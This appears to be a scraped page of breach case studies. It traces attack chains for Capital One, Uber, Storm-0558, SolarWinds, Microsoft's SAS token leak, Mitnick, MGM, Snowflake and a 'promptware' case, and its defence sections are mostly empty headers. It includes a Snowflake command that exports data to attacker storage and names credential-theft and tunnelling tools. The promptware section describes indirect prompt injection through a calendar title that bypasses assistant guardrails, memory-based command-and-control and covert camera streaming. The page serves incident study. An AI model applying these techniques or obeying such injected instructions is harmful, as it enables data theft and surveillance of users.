Capital One β SSRF β IMDSv1 β Over-Privileged IAM Role β 106M Record S3 Exfiltration
A former AWS engineer exploited a misconfigured WAF via server-side request forgery to reach the EC2 instance metadata service, stealing temporary IAM role credentials. An over-privileged role then granted access to 700+ S3 buckets containing 106 million customer records. The attack ran undetected for 77 days and directly caused AWS to build IMDSv2.
Thompson built a custom tool to scan the internet for EC2-hosted web applications that would relay requests to the AWS instance metadata service at 169.254.169.254. SSRF was not in ModSecurity's default detection rule set β it had to be explicitly configured.
Why SSRF wasn't blocked: Not in default WAF rules β required manual configuration
Scanning approach: Automated β targeted multiple AWS-hosted organisations
The WAF was misconfigured β running in logging-only mode or bypassable β so Thompson sent crafted HTTP requests containing the IMDS endpoint as the target URL. The WAF relayed these server-side, making the EC2 instance itself issue the metadata request.
IMDSv1 behaviour: No authentication β any GET request from the instance is served
WAF failure: Relayed SSRF payload rather than blocking it
IMDSv1 returned the temporary AWS credentials (AccessKeyId, SecretAccessKey, SessionToken) for the "ISRM-WAF-Role" attached to the EC2 instance. No token, header, or authentication required β just a GET request to the metadata path from within the instance (which the SSRF provided).
Credentials returned: AccessKeyId + SecretAccessKey + SessionToken
Key problem: The role had S3 permissions far beyond what a WAF needs
With the stolen AWS credentials, Thompson used the CLI to list all S3 buckets accessible to the ISRM-WAF-Role. The role had been granted sweeping S3 list and read permissions β far beyond what a WAF firewall function ever needed β violating least privilege at the design level.
Result: 700+ buckets listed including Capital One customer data stores
Root failure: IAM role permissions never reviewed against principle of least privilege
Thompson synced S3 bucket contents to external storage using aws s3 sync. Approximately 30GB over multiple sessions β 100M US and 6M Canadian credit card application records, 140,000 SSNs, 80,000 bank account numbers, credit scores, and transaction history.
Data exfiltrated: 106M records, 140K SSNs, 80K bank accounts, credit/financial history
Detection gap: GuardDuty not enabled; S3 access logs not monitored for volume anomalies
Thompson bragged about the breach on GitHub and in Slack and IRC channels under the handle "erratic." A member of the public noticed the posts, reviewed the data, and filed a responsible disclosure with Capital One on July 17, 2019. No internal monitoring β not GuardDuty, not S3 access logs, not IAM anomaly detection β caught the breach during the 77-day dwell period.
Monitoring failures: No GuardDuty Β· No S3 volume alerts Β· No anomalous IAM activity detection
Arrest: Paige Thompson, July 29, 2019
π‘ How to Defend Against This Chain
Primary Sources
Uber β Dark Web Creds β MFA Push Fatigue β Hardcoded PAM Secret β Full AWS/GCP Admin
An 18-year-old attacker purchased an Uber contractor's VPN credentials from a dark web infostealer marketplace, then used MFA push-bombing combined with WhatsApp social engineering to bypass two-factor auth. Once inside the corporate network, they found a PowerShell script with hardcoded admin credentials for Thycotic β Uber's PAM system β unlocking full admin access to AWS, GCP, Slack, SentinelOne, HackerOne, and more within hours.
The targeted contractor's device had previously been infected with infostealer malware, which exfiltrated saved browser credentials to a dark web marketplace. The attacker purchased the username and password β no zero-day or technical exploit required.
Credential type: Uber contractor corporate VPN credentials
Defence gap: No monitoring for credential leakage Β· Third-party device not enrolled in MDM or health-checked before VPN access
The attacker repeatedly attempted VPN login, flooding the contractor's phone with MFA push notifications. After approximately an hour of notifications, they contacted the contractor on WhatsApp claiming to be Uber IT support and stating the only way to stop the notifications was to approve one. The contractor complied.
Social engineering: WhatsApp message: "I'm from Uber IT. Accept the push to stop the notifications."
MFA type: Push notification (not phishing-resistant FIDO2)
Why it worked: No number-matching Β· No limit on push attempt rate
Once the contractor approved the push, the attacker connected to Uber's corporate VPN and began scanning the internal network. Internal infrastructure had no micro-segmentation β a contractor VPN account could reach all internal file shares.
Recon target: Internal file shares and intranet services
Defence gap: No east-west network segmentation Β· Contractor VPN had broad internal network visibility
On an internal network share accessible via the contractor VPN, the attacker found a PowerShell script containing plaintext admin credentials for Thycotic β Uber's Privileged Access Management platform. This single file became the skeleton key to every system in the organisation.
Contents: Hardcoded Thycotic domain admin username + password in plaintext
Irony: Thycotic was the PAM system specifically designed to prevent hardcoded secrets
Root cause: Automation script needed PAM API access but used a static credential instead of a scoped service account
Using the admin credentials, the attacker logged into Thycotic and extracted all stored secrets. Thycotic was the single source of truth for credentials across Uber's entire cloud and SaaS footprint.
β AWS (cloud infrastructure admin)
β GCP + Google Workspace (admin)
β Slack workspace (admin β used to announce breach to all Uber employees)
β SentinelOne XDR (admin β ability to suppress security alerts)
β HackerOne admin console (access to private vulnerability reports)
β DUO, OneLogin, VMware vSphere, Uber internal dashboards
The attacker used their Slack admin access to broadcast a message to all Uber employees announcing the breach, then posted screenshots on Twitter under "teapotuberhacker." Uber's security team discovered the breach within hours β not through monitoring, but through the attacker's announcement.
Key gap: No alert fired on new AWS admin account creation Β· No alert on PAM admin login from unknown device
SentinelOne access meant: The attacker could have suppressed EDR alerts to cover tracks
π‘ How to Defend Against This Chain
Primary Sources
Storm-0558 β Compromised Engineer β Crash Dump β Stolen MSA Signing Key β Forged Tokens β Government Email Espionage
Chinese nation-state actor Storm-0558 compromised a Microsoft engineer's corporate account, discovered a consumer MSA signing key that had accidentally been included in a crash dump in a debugging environment, and used it to forge authentication tokens. A token validation bug in Exchange Online accepted these consumer tokens as enterprise credentials, enabling access to ~25 organisations' email β including 60,000 US State Department emails β for weeks before discovery.
Storm-0558 targeted an engineer whose device had been compromised prior to joining Microsoft (likely during a company acquisition). After the engineer joined Microsoft, the attackers used this foothold to access Microsoft's corporate network β where they would remain for approximately two years before exploiting the signing key.
Dwell time on Microsoft network: April 2021 β ~June 2023 (2 years)
Log retention gap: Microsoft could not confirm exfiltration due to log retention policy limits
A 2021 system crash in Microsoft's signing infrastructure generated a crash dump that, due to a race condition bug, incorrectly included consumer MSA signing key material that should never leave the isolated signing environment. The dump was copied to a debugging environment accessible to engineering accounts. Storm-0558, using the compromised engineer's account, accessed and exfiltrated the key.
How it leaked: Race condition bug caused crash dump to include signing key material
How accessed: Crash dump in debug environment β accessible via compromised engineer account
Microsoft quote: "Operational errors resulted in key material leaving the secure token signing environment"
Starting May 15, 2023, Storm-0558 used the stolen MSA consumer signing key to forge OpenID v2.0 access tokens impersonating specific users at targeted government organisations. The tokens were correctly signed β any service validating them against Microsoft's published public keys would accept them as legitimate.
Blast radius (per Wiz): Could forge tokens for any Azure AD app supporting personal account auth β not just Exchange
Services potentially at risk: OneDrive, SharePoint, Teams, any app using "Login with Microsoft"
Consumer and enterprise signing keys are separate systems and should only be valid for their respective scopes. However, the Exchange Online team had incorrectly assumed the Azure AD SDK validated token issuers by default β it didn't. This meant Exchange Online accepted the forged consumer-scoped tokens as valid enterprise credentials. An additional OWA GetAccessTokenForResource API bug let attackers generate fresh Exchange tokens from forged tokens.
OWA additional bug: GetAccessTokenForResource API issued fresh tokens from already-issued forged tokens
Result: Consumer MSA token β accepted as enterprise Exchange Online credential
Using PowerShell and Python scripts against the OWA REST API with forged tokens, Storm-0558 read and exfiltrated email from ~25 organisations including senior US State Department and Commerce Department officials. Access ran for at least 6 weeks before discovery.
State Dept loss: ~60,000 emails including communications of the US Ambassador to China
Other victims: Commerce Secretary Raimondo + senior officials across ~25 organisations
The State Dept detected the breach via a custom alert rule triggered by the MailItemsAccessed audit event β which was only available to organisations that had purchased Microsoft's E5 license tier. Organisations on lower tiers could not see this event and were unable to detect the breach independently. Following CISA pressure, Microsoft extended MailItemsAccessed to E3 customers in September 2023.
Critical licensing gap: MailItemsAccessed was E5-only at time of breach Β· Most victims couldn't see it
Dwell time: ~6 weeks of confirmed email access; potentially 2 months total
π‘ How to Defend Against This Chain
Primary Sources
SolarWinds β Build System Compromise β SUNBURST Backdoor β On-Prem to Cloud Pivot β Golden SAML β US Government Espionage
Russian SVR (APT29 / Cozy Bear) breached SolarWinds' build pipeline and injected the SUNBURST backdoor into signed Orion software updates sent to 18,000+ customers. At high-value government targets, they used SUNBURST to achieve domain admin on-premises, then stole the ADFS token-signing certificate to forge Golden SAML tokens β bypassing MFA entirely to access Azure AD and Microsoft 365 environments for months. This was the first major nation-state supply chain attack that explicitly pivoted from on-premises to cloud identity.
SVR gained access to SolarWinds' internal build system and installed SUNSPOT β a build-time implant that monitored the MSBuild.exe process and injected SUNBURST malicious code into Orion.Core.BusinessLayer.dll during compilation. The resulting DLL was then signed with SolarWinds' legitimate code-signing certificate, making it appear authentic.
Code signing: Trojanized DLL signed with SolarWinds' legitimate certificate (trusted by customers)
Dormancy: SUNBURST waited ~2 weeks post-installation before activating (to evade sandbox detection)
From March 2020, trojanized Orion updates were installed by customers. SUNBURST beaconed to the attacker-controlled domain avsvmcloud[.]com using DNS subdomain queries that encoded victim environment information. SVR then selectively activated only high-value targets for further exploitation β the majority of the 18,000 infected organisations were never actively exploited.
Evasion: Traffic mimicked legitimate SolarWinds telemetry Β· Dormancy period bypassed sandbox detection
Selective exploitation: 18,000 infected Β· ~100 actively pursued by SVR
At selected high-value targets, SUNBURST delivered TEARDROP β a memory-resident dropper β which deployed Cobalt Strike BEACON for interactive C2 and lateral movement. SVR used BEACON to escalate to domain admin privileges on the victim's on-premises Active Directory, positioning themselves to attack cloud identity via the ADFS server.
Goal of on-prem access: Reach ADFS server to steal the SAML token-signing certificate
Evasion: All traffic masqueraded as legitimate SolarWinds API activity
With domain admin privileges, SVR extracted the ADFS token-signing private key and certificate from the on-premises federation server. Using this key, they could forge SAML assertions impersonating any user β "Golden SAML." Forged SAML tokens bypass MFA entirely because the SAML assertion IS the proof of authentication β no second factor is requested when a valid SAML response is presented.
1. Extract ADFS private signing key + certificate (requires domain admin)
2. Forge SAML assertion claiming to be any privileged user (Global Admin, etc.)
3. Present to Azure AD / M365 β accepted as fully legitimate
4. MFA bypassed β the forged SAML IS the authentication proof
Persistence: SAML signing certs rarely rotated β access persisted indefinitely without re-exploitation
SVR accessed M365 environments at multiple US government agencies including Treasury, Commerce, DHS, State Department, and DOJ. Critically, they also modified Azure AD to add trusted federated identity providers and OAuth application permissions β cloud-layer backdoors that persisted even after SolarWinds Orion was removed from victim networks.
Cloud persistence mechanisms added:
β New federated identity providers added to Azure AD
β OAuth app permissions granted for API-based access
β Service principal credentials added for ongoing access
Key lesson: Removing Orion did NOT remove cloud access β Azure AD had to be separately evicted
FireEye discovered theft of its proprietary red team offensive tools during an internal investigation and traced the intrusion to a trojanized SolarWinds Orion update. Their public disclosure on December 13, 2020 triggered a global incident response and CISA Emergency Directive 21-01 requiring all federal agencies to immediately disconnect Orion. Crucially, removing Orion did not remove cloud persistence β Azure AD backdoors required a separate, comprehensive eviction process.
Time from build compromise to discovery: ~14 months
CISA ED 21-01: All federal agencies ordered to disconnect SolarWinds Orion immediately
Critical complication: Cloud-layer backdoors (Azure AD federation, OAuth apps) persisted after Orion removal
π‘ How to Defend Against This Chain
Microsoft AI Research SAS Token β Over-Permissioned Token β Public GitHub β 38TB Internal Data Exposed for 3 Years
A Microsoft AI researcher shared a URL to open-source training data on a public GitHub repository. The URL contained an Azure Shared Access Signature token β but instead of being scoped to a specific file or container, it was an Account SAS with full-control permissions to the entire storage account, set to expire in 2051. Anyone who found the URL could read, modify, or delete 38TB of internal Microsoft data including employee workstation backups, private keys, saved passwords, and 30,000+ internal Teams messages. Discovered and responsibly disclosed by Wiz Research in June 2023 after ~3 years of exposure.
When sharing open-source AI training data publicly, the researcher used Azure's SAS token feature but chose the broadest option β an Account SAS β rather than a narrowly-scoped Service SAS. They set permissions to "full control" (read, write, delete) and the expiry to October 2051. Azure does not audit SAS token generation, making this invisible to administrators.
Permissions set: Full control β read, write, delete, list everything
Expiry set: October 6, 2051 (30+ years)
Azure's own warning: "Not possible to audit generation of SAS tokens" β no admin visibility
The researcher committed the complete SAS token URL to the public GitHub repository "robust-models-transfer" as download instructions. GitHub's secret scanning did not cover Account SAS token patterns at the time. The URL was publicly visible for nearly 3 years. In October 2021, the token was renewed β with the expiry extended to October 2051.
Exposed from: July 20, 2020 to June 24, 2023 (2 years 11 months)
Token renewed: October 2021 β expiry extended to 2051 (30 more years)
Scanning gap: GitHub secret scanning did not cover Account SAS tokens until after this disclosure
Anyone with the URL had full access to an internal Azure Blob storage account β not just the intended training data folder. The account contained disk backups of two Microsoft employees' workstations with saved passwords, private keys, and an archive of 30,000+ internal Microsoft Teams messages. Full-control permissions also meant a malicious actor could have injected code into AI model files, creating a supply chain attack vector.
β Disk backups of 2 employee workstations (passwords, private keys, personal data)
β 30,000+ Microsoft Teams messages from 359 employees
β Internal credentials and secret keys
β Intended open-source AI training data
Supply chain risk: Write access meant an attacker could have injected malicious code into AI model files
Wiz Research runs an ongoing project scanning the internet and public repositories for misconfigured cloud storage. While reviewing Microsoft's public AI GitHub repositories, they found the SAS token URL, followed it, and discovered the full scope of exposure. They reported to Microsoft MSRC on June 22; the token was revoked on June 24, 2023 β 2 days later. Coordinated public disclosure followed on September 18, 2023.
Reported: June 22, 2023 | Token revoked: June 24, 2023 (48 hours)
GitHub URL updated: July 7, 2023 | Public disclosure: September 18, 2023
No evidence: Microsoft found no evidence of malicious exfiltration beyond Wiz's research
π‘ How to Defend Against This Chain
Primary Sources
Kevin Mitnick / Novell β OSINT β Pretexting β Phone Social Engineering β Dial-Up Access β NetWare Source Code Theft
While a fugitive living under a false identity in Denver, Kevin Mitnick β the FBI's most wanted hacker β targeted Novell's technical support staff using a technique he called pretexting. By impersonating a Novell employee using authentic corporate lingo, internal knowledge, and manufactured urgency, he convinced support staff to provide credentials and system access. He then used dial-up connections to extract proprietary NetWare source code. Shawn Nunley, a Novell support analyst at the time, was directly targeted by Mitnick and later became the FBI's star witness β before becoming one of Mitnick's closest friends. This entry is notable as a foundational case study in social engineering before the term existed in mainstream security.
Before making a single call, Mitnick invested significant time learning everything publicly available about his target. He gathered employee names from directory listings, understood Novell's internal team structures, and immersed himself in NetWare technical documentation so he could speak fluently about the product β a prerequisite for any convincing pretext. As he wrote in The Art of Deception: "When you know the lingo and terminology, it establishes credibility β you're legit, a coworker slogging in the trenches just like your targets."
Goal: Build enough authentic detail to withstand scrutiny from a real Novell employee
Mitnick's method: "Pretext calls" β low-stakes calls to gather information for higher-stakes calls later
Mitnick called Novell's technical support line β the same line customers and employees used β and presented himself as a legitimate Novell employee or developer with a plausible reason for needing help. He used real employee names, correct internal terminology, and manufactured urgency to make the call feel routine. Shawn Nunley, a support analyst, took the call.
Technique used: Pretexting β a fully constructed scenario with backstory, urgency, and technical credibility
Location: Mitnick was calling from Denver, living as "Eric Weiss" under a fabricated identity
Mitnick's genius was not technical β it was psychological. He assessed his target's willingness to cooperate in the first few seconds, adapting his approach in real time. He used Novell-specific technical language that only an insider would know, referenced real internal projects or colleagues, and framed his request as urgent but routine β something that needed to be resolved quickly to avoid a bigger problem. This is the core of social engineering: making the target feel that compliance is the safe, helpful, professional response.
Mitnick on reading targets: "I'm always on the watch for signs that give me a read on how cooperative a person is"
Why support staff were vulnerable: Helping people quickly was their job β suspicion felt like being unhelpful
Once trust was established, Mitnick steered the conversation toward his actual goal β obtaining credentials, a dial-up number, or system access that would let him connect to Novell's internal network remotely. The request was framed as something mundane: a password reset, a need for a dial-in number to work remotely, or a request to verify account details. The target had no reason to suspect anything unusual.
Federal indictment: Mitnick and DePayne "stole and copied proprietary computer software from Novell" including NetWare source code
Using the credentials or dial-up access obtained from the call, Mitnick connected to Novell's internal systems remotely from his Denver apartment β at night, while working a day job at a law firm under a false identity. To hide his location from both the FBI and the phone company, he used cloned cellular phones, cycling through cloned numbers to avoid detection through call records.
Credentials used: Obtained via social engineering call to support staff
Location obfuscation: Cloned cellular phones β using stolen ESN/MIN pairs to masquerade as other subscribers
When: Nights, while working as "Eric Weiss" at a Denver law firm during the day
With authenticated access to Novell's internal systems, Mitnick copied proprietary NetWare source code β some of the most valuable intellectual property the company owned. The federal indictment confirmed that Mitnick and co-conspirator Lewis DePayne stole and copied this software. Mitnick's motivation, as he repeatedly stated, was not financial β it was intellectual curiosity and the challenge of accessing systems that were supposed to be inaccessible.
Co-conspirator: Lewis DePayne (charged alongside Mitnick)
Motivation: Intellectual curiosity β Mitnick: "simple crimes of trespass... I wanted to know how these systems worked"
No financial use: No evidence source code was ever sold or used commercially
The FBI built their case against Mitnick in part through witness testimony from support staff he had targeted. Shawn Nunley, who had taken Mitnick's call at Novell, became the government's star witness. But the story didn't end there β Shawn grew disillusioned with the government's handling of the case, contacted Mitnick's defence team, and ultimately became one of Mitnick's dearest friends. It's one of the most extraordinary victim-to-friend trajectories in the history of computer crime.
Found with: Cloned cellular phones, 100+ cloned phone codes, multiple pieces of false identification
Sentence: 46 months + 22 months for supervised release violation (5 years total, including 8 months solitary)
Shawn Nunley: FBI star witness β disillusioned with prosecution β contacted defence β lifelong friend of Mitnick
π‘ How to Defend Against This Chain
Scattered Spider / MGM Resorts β LinkedIn OSINT β Vishing Help Desk β Okta Super Admin β Azure AD β 100 ESXi Servers Encrypted
Scattered Spider (UNC3944) compromised MGM Resorts International in September 2023 using a single 10-minute phone call to the IT help desk. Attackers researched an MGM employee on LinkedIn, impersonated them to a help desk agent, obtained an MFA reset, and gained initial access. From there they escalated to Okta Super Administrator, claimed Azure AD tenant-level control, moved laterally across the network, and encrypted over 100 ESXi hypervisors using ALPHV/BlackCat ransomware β causing $100M in losses and a 10-day outage. The entire initial access chain required no technical exploit whatsoever.
Before making any call, the attacker used LinkedIn to identify an MGM Resorts employee β gathering their full name, job title, and enough personal and professional detail to convincingly impersonate them to an IT help desk agent. Mandiant confirmed from forensic recordings of these call center attacks that the threat actors already possessed PII on their victims before calling β including SSN last four digits, dates of birth, and manager names β to pass standard help desk identity verification. Scattered Spider are native English speakers, removing any accent barrier that typically flags social engineering attempts from non-Western threat actors.
PII used to pass verification (Mandiant confirmed): Last 4 digits of SSN, date of birth, manager name and job title
Why it worked: Help desks are trained to be helpful β suspicion of an "employee" feels obstructive
Mandiant: "The level of sophistication in these social engineering attacks is evident in both the extensive research performed on potential victims and the high success rate"
The attacker called MGM's IT help desk, impersonated the employee identified on LinkedIn, and requested a multi-factor authentication reset. Mandiant confirmed from forensic recordings that the consistent pretext used was claiming to be receiving a new phone β a routine scenario that naturally requires an MFA reset. The agent had no way to verify the caller's true identity beyond the PII provided, which matched what the attacker had gathered. The call lasted approximately 10 minutes.
Pretext used (Mandiant confirmed): "I'm receiving a new phone and need my MFA reset" β a routine, unsuspicious request
Verification bypassed with: SSN last 4 digits, date of birth, manager name β all pre-researched
Verification failure: Help desk had no phishing-resistant out-of-band identity verification
ALPHV statement: "All SCATTERED SPIDER did to get into MGM was hop on LinkedIn, find an employee, then call the help desk"
With initial account access, the attacker's first move was not to escalate immediately β it was to read. Mandiant confirmed that UNC3944 consistently searched victims' internal SharePoint sites for help guides and documentation covering VPNs, virtual desktop infrastructure (VDI), and remote telework utilities. This gave them a roadmap of the environment drawn entirely from the victim's own internal documentation, dramatically accelerating lateral movement planning without triggering any security tooling.
Content targeted (Mandiant confirmed): VPN setup guides, VDI connection instructions, remote telework utilities documentation
Why effective: Internal IT docs contain exactly the information an attacker needs β network topology, tool names, access paths
Detection gap: SharePoint search activity by a recently-reset account is virtually indistinguishable from legitimate onboarding
With initial account access, the attacker escalated to Okta Super Administrator. Mandiant additionally confirmed a technique not widely reported: UNC3944 used Okta's self-assignment feature to assign the compromised account to every application in the Okta instance β giving them SSO access to every federated application simultaneously, and a visual inventory of every app tile available in the Okta portal. They also configured a second Identity Provider as an impersonation app and stripped MFA from targeted admin accounts.
Privilege achieved: Super Administrator β full control over all identity for downstream applications
Mandiant confirmed technique: Okta self-assignment to every app in the instance β instant access to all SSO-protected applications
IdP abuse: Second Identity Provider configured as "impersonation app" β could act as any user in the org
MFA stripped: Second-factor requirements removed from authentication policies for targeted accounts
Having compromised Okta, the attacker pivoted to MGM's Azure AD tenant and claimed super administrator privileges including Tenant Root Group management permissions. Mandiant additionally confirmed a persistence technique specific to this group: UNC3944 accessed vSphere and Azure through SSO applications to create entirely new virtual machines, from which all follow-on activities were conducted. These attacker-controlled VMs had Microsoft Defender and Windows telemetry disabled, making forensic investigation significantly harder.
Mandiant confirmed persistence: New VMs created in vSphere and Azure via SSO β used as clean base for all further activity
VM hardening by attacker: MAS_AIO and privacy-script.bat used to remove Microsoft Defender and Windows telemetry
PCUnlocker ISO: Attached to existing VMs via vCenter to reset local admin passwords, bypassing domain controls
Impact: Cloud activity sourced from inside the environment β malicious traffic indistinguishable from legitimate traffic
With domain-level cloud access, the attacker moved laterally using legitimate tools already present in the environment. Mandiant confirmed several techniques not widely reported: UNC3944 created API keys inside CrowdStrike's external console to run commands (whoami, quser) via the Real Time Response module β effectively using the victim's own EDR as a remote access tool. They also used Mimikatz, ADRecon, and IMPACKET from attacker-controlled VMs, along with multiple tunnelling tools for persistent C2.
Credential theft: Mimikatz, "SecretServerSecretStealer" PowerShell script, ADRecon
Tunnelling tools (Mandiant confirmed): NGROK, RSOCX, Localtonet, Tailscale, Remmina
Python libraries: IMPACKET installed on attacker VMs
EDR evasion: BYOVD β CVE-2015-2291 Intel driver used to disable endpoint security agents
SaaS accessed (Mandiant confirmed): vCenter, CyberArk, Salesforce, Azure, CrowdStrike, AWS, GCP β all via Okta SSO
Before deploying ransomware, the attacker exfiltrated sensitive data from MGM's environment β establishing the leverage needed for double extortion. They threatened to publish the stolen data unless the ransom was paid, independent of whether MGM could recover from encryption using backups. Caesars Entertainment, hit in a similar attack at the same time, paid approximately $15 million ransom to prevent data publication.
Caesars parallel: Caesars paid ~$15M ransom; MGM refused and incurred ~$100M in losses instead
ALPHV statement: Claimed to still have access to MGM infrastructure and threatened further attacks
Data targeted: Customer PII, loyalty programme data, internal credentials
Exfil method: Legitimate cloud storage and remote access tools β no custom malware required
On September 11, 2023 β after MGM failed to respond to the attacker's contact attempts β ALPHV/BlackCat ransomware was deployed against over 100 ESXi hypervisors across MGM's Las Vegas properties. The rapid encryption of 100+ VMware ESXi servers caused a 36+ hour initial outage and disrupted casino floor operations, hotel check-ins, digital room keys, ATMs, and slot machines for 10 days across multiple Las Vegas properties. MGM refused to pay the ransom.
Targets: 100+ VMware ESXi hypervisors running MGM's production VMs
Timeline: Deployed Sept 11, 2023 β after MGM ignored attacker contact attempts for 24hrs
Impact: Casino floors, hotel check-ins, digital room keys, ATMs, slot machines β all disrupted
Financial impact: ~$100M losses + $45M class-action lawsuit settlement
MGM decision: Refused to pay ransom β incurred full remediation cost instead
π‘ How to Defend Against This Chain
Promptware β Indirect Prompt Injection β Context Poisoning β Persistence β C2 β Covert Camera Livestream
Researchers demonstrated a complete seven-stage kill chain targeting cloud-connected AI assistants β from a malicious Google Calendar invite to covert Zoom video streaming, all triggered by the victim typing "thanks." Documented across 36 real-world incidents by Schneier, Nassi et al., the pattern β termed "promptware" β mirrors classical malware kill chains but executes entirely through the LLM prompt layer. C2 was confirmed in the ChatGPT ZombAI attack (Oct 2024) and the Microsoft Copilot Reprompt attack (Jan 2026, CVE-2026-24307), both patched after disclosure.
Attacker sends the target a Google Calendar meeting invitation with a malicious prompt embedded in the event title. When the victim asks Gemini "What are my meetings today?", the Google Calendar Agent retrieves the event β including the poisoned title β and feeds it directly into Gemini's active context. The victim never sees the raw title; they only see Gemini's natural-language response. This is indirect prompt injection: the attacker's instructions enter the LLM through a trusted, user-requested data retrieval, not through direct user input.
Injection type: Indirect β attacker content retrieved by the LLM on the victim's behalf
Why it works: LLMs process all tokens β system prompts, user queries, retrieved data β as a single undifferentiated sequence; there is no code/data boundary
The injected prompt uses a technique called "delayed tool invocation": rather than triggering immediately (which would fire safety checks against the poison payload), the instructions stage the malicious action and wait for the user to perform a neutral follow-up β such as thanking Gemini. When the user types "thanks," Gemini re-enters a new inference step and the guardrails that evaluated the calendar retrieval do not re-evaluate the deferred instruction. The attacker's command executes with Gemini's full tool permissions.
Guardrail failure: Safety checks evaluated at prompt parse time, not at deferred execution time
Effect: Attacker instructions treated as trusted system-level directives with full tool access
Following jailbreak, the injected prompt queries Gemini for its available tool inventory: connected agents (Google Calendar, Google Home, Gmail, Meet), installed mobile applications (Zoom, browser), and the user's stored memories and calendar data. Unlike classical malware reconnaissance β which precedes initial access β promptware recon occurs after context poisoning, because the LLM's tool inventory is only enumerable once the assistant is under attacker control. The enumeration results feed back into the attacker's context silently; nothing is displayed to the victim.
Key difference from classical recon: Occurs post-initial-access, not before β order is inverted
Visibility to victim: None β responses go to model context, not rendered in the chat UI
Because the malicious prompt is embedded in a Google Calendar artifact, it persists in the workspace's long-term agent memory. Every subsequent session where Gemini accesses calendar data re-injects the attacker's instructions β turning a one-time event into a durable implant. The parallel ZombAI attack (ChatGPT, Oct 2024) demonstrated the same mechanism more explicitly: a prompt injection write to ChatGPT's persistent memory store caused the model to fetch C2 instructions from an attacker-controlled GitHub page at the start of every new conversation, indefinitely.
ZombAI mechanism: Prompt injection β write to ChatGPT long-term memory β C2 instructions injected into every conversation
Defence gap: No mechanism to audit, alert on, or require user consent for unexpected memory writes
ZombAI (Oct 2024): persisted memory instructs ChatGPT to fetch a GitHub Issues page at session start. The attacker posts updated instructions as sequential issues; a COUNTER increment in the payload defeats ChatGPT's page-caching so each beacon retrieves fresh commands. This was the first confirmed promptware-native C2 capability β the attacker remotely controlled the compromised ChatGPT instance with no conventional malware infrastructure. Reprompt (Jan 2026, CVE-2026-24307): a crafted Microsoft Copilot URL with a malicious q parameter caused Copilot to dynamically fetch follow-up instructions from an attacker server β exfiltrating session and profile data incrementally, with no limit on type or volume.
Reprompt C2 channel: Attacker HTTPS server; double-request technique bypasses Copilot guardrails on re-issue
What makes it novel: C2 channel runs entirely through the LLM prompt layer β no injected binary, no network backdoor
On-device lateral movement: the injected calendar prompt instructs Gemini to invoke a second agent or app. On mobile, Automatic App Invocation allows the assistant to launch Zoom, open a browser URL, or trigger Google Home actions (unlock smart windows, activate boiler) β all from a single compromised calendar entry. Off-device worm propagation: in a parallel threat class, a compromised email assistant is instructed to forward the poisoned payload to every address in the victim's contact book, achieving org-wide spread without any further attacker action. Nassi et al. demonstrated both paths; 73% of analysed threat classes were rated HighβCritical.
Off-device worm: Infected email assistant self-replicates payload to entire contact list
Physical world impact: Smart home device control demonstrated β digital breach crosses into physical environment
When the user enters a benign follow-up response, the staged delayed invocation fires: Gemini automatically launches Zoom and initiates a video session, covertly streaming the victim's camera. No camera indicator activates before the session starts; the victim has no warning. In Reprompt data-exfiltration variants, the attacker's C2 server incrementally extracts session context, personal profile data, and any detail inferred from prior responses β with the attacker dynamically refining queries based on each reply. Nassi et al. also demonstrated sending spam email from the victim's account, publishing disinformation, and controlling physical home devices as alternative objectives.
Reprompt objective: Incremental data exfiltration β attacker probes for sensitive details based on prior C2 replies
Discovery: Google deployed mitigations after SafeBreach disclosure; Reprompt (CVE-2026-24307) patched Jan 13 2026
π‘ How to Defend Against This Chain
q= URL parameter to prefill a malicious Copilot prompt. Enforce Microsoft Purview DLP policies for Copilot, flag outbound requests where AI query parameters contain instruction-like text, and monitor for LLM sessions issuing sequential requests to external servers β the signature of C2 chain-request exfiltration.UNC5537 / Snowflake β Infostealer Creds β No MFA β SHOW TABLES β Bulk Exfil β 100+ Orgs Extorted
A financially motivated threat actor tracked as UNC5537 spent months harvesting Snowflake credentials from infostealer malware logs, then systematically logged into victim Snowflake tenants β none of which required MFA β and exfiltrated large datasets. Over 100 organisations were hit including Ticketmaster (560M records), AT&T (73M records), and Santander Bank. Snowflake itself was not breached; the attack was entirely predicated on absent MFA and reused credentials.
UNC5537 sourced valid Snowflake credentials from infostealer malware logs β RedLine, Vidar, and Lumma stealer families had infected contractor and employee devices, exfiltrating saved browser credentials including Snowflake login URLs. The logs were purchased from underground markets or obtained from prior campaigns. Mandiant confirmed some credentials were years old and still valid because passwords had never been rotated.
Credential age: Some logs dated years prior to the campaign β passwords never rotated
Why it worked: No Snowflake-side MFA requirement Β· No network policy allowlisting Β· No anomalous-login alerting
Using the harvested credentials, UNC5537 authenticated to each victim's Snowflake instance. Snowflake did not enforce MFA by default at the time β it was available but opt-in. None of the compromised accounts had MFA enabled, and no network policy restricted which IPs could connect to the tenants. The attacker connected using the SnowSQL CLI and the Snowflake JDBC driver to automate credential testing at scale.
MFA status: Not enforced β opt-in at account level, not mandated by Snowflake platform policy
Network policy: No IP allowlist configured on any of the affected tenants
Detection gap: Logins from new IPs/countries generated no alert to account owners
Once authenticated, UNC5537 ran Snowflake's native enumeration commands to identify all databases, schemas, and tables accessible to the compromised user. The commands are native SQL β no exploitation required. Because the accounts were often service accounts or analyst accounts with broad SELECT permissions, the full data landscape of the tenant was visible in seconds.
Also used: SELECT * FROM INFORMATION_SCHEMA.TABLES to enumerate accessible objects
Typical finding: PII tables β customer names, emails, phone numbers, payment card data, SSNs
UNC5537 used standard Snowflake SQL to stage target data into temporary tables, then exported it via COPY INTO to an external stage (attacker-controlled S3 bucket or Azure Blob) or downloaded it directly via GET. Large datasets like Ticketmaster's 560M-row table were extracted over multiple sessions. Snowflake's query history log retained these commands, providing forensic visibility after the fact β but no real-time alerting fired during exfiltration.
Stage 2 β export: COPY INTO @external_stage/dump.csv.gz FROM attacker_export;
Scale (Ticketmaster): 560M records, 1.3TB β sold on BreachForums for $500,000
Detection gap: No DLP on Snowflake COPY INTO Β· No alert on large external stage writes
After exfiltration, UNC5537 contacted victims directly with samples of stolen data as proof, demanding payment for deletion. When victims did not pay, datasets were listed for sale on BreachForums. The Ticketmaster database was offered for $500,000; AT&T data was listed separately. Mandiant assessed UNC5537 had at least one member residing in North America and coordinated with a partner in Turkey.
BreachForums listing: Ticketmaster β 560M records, $500,000 Β· AT&T β 73M records
Actor attribution: UNC5537 β financially motivated, some members in North America and Turkey
π‘ How to Defend Against This Chain
LastPass β Dev Env Breach β Source Code Recon β DevOps Home PC (Plex Exploit) β Keylogger β AWS S3 Vault Backup Exfil
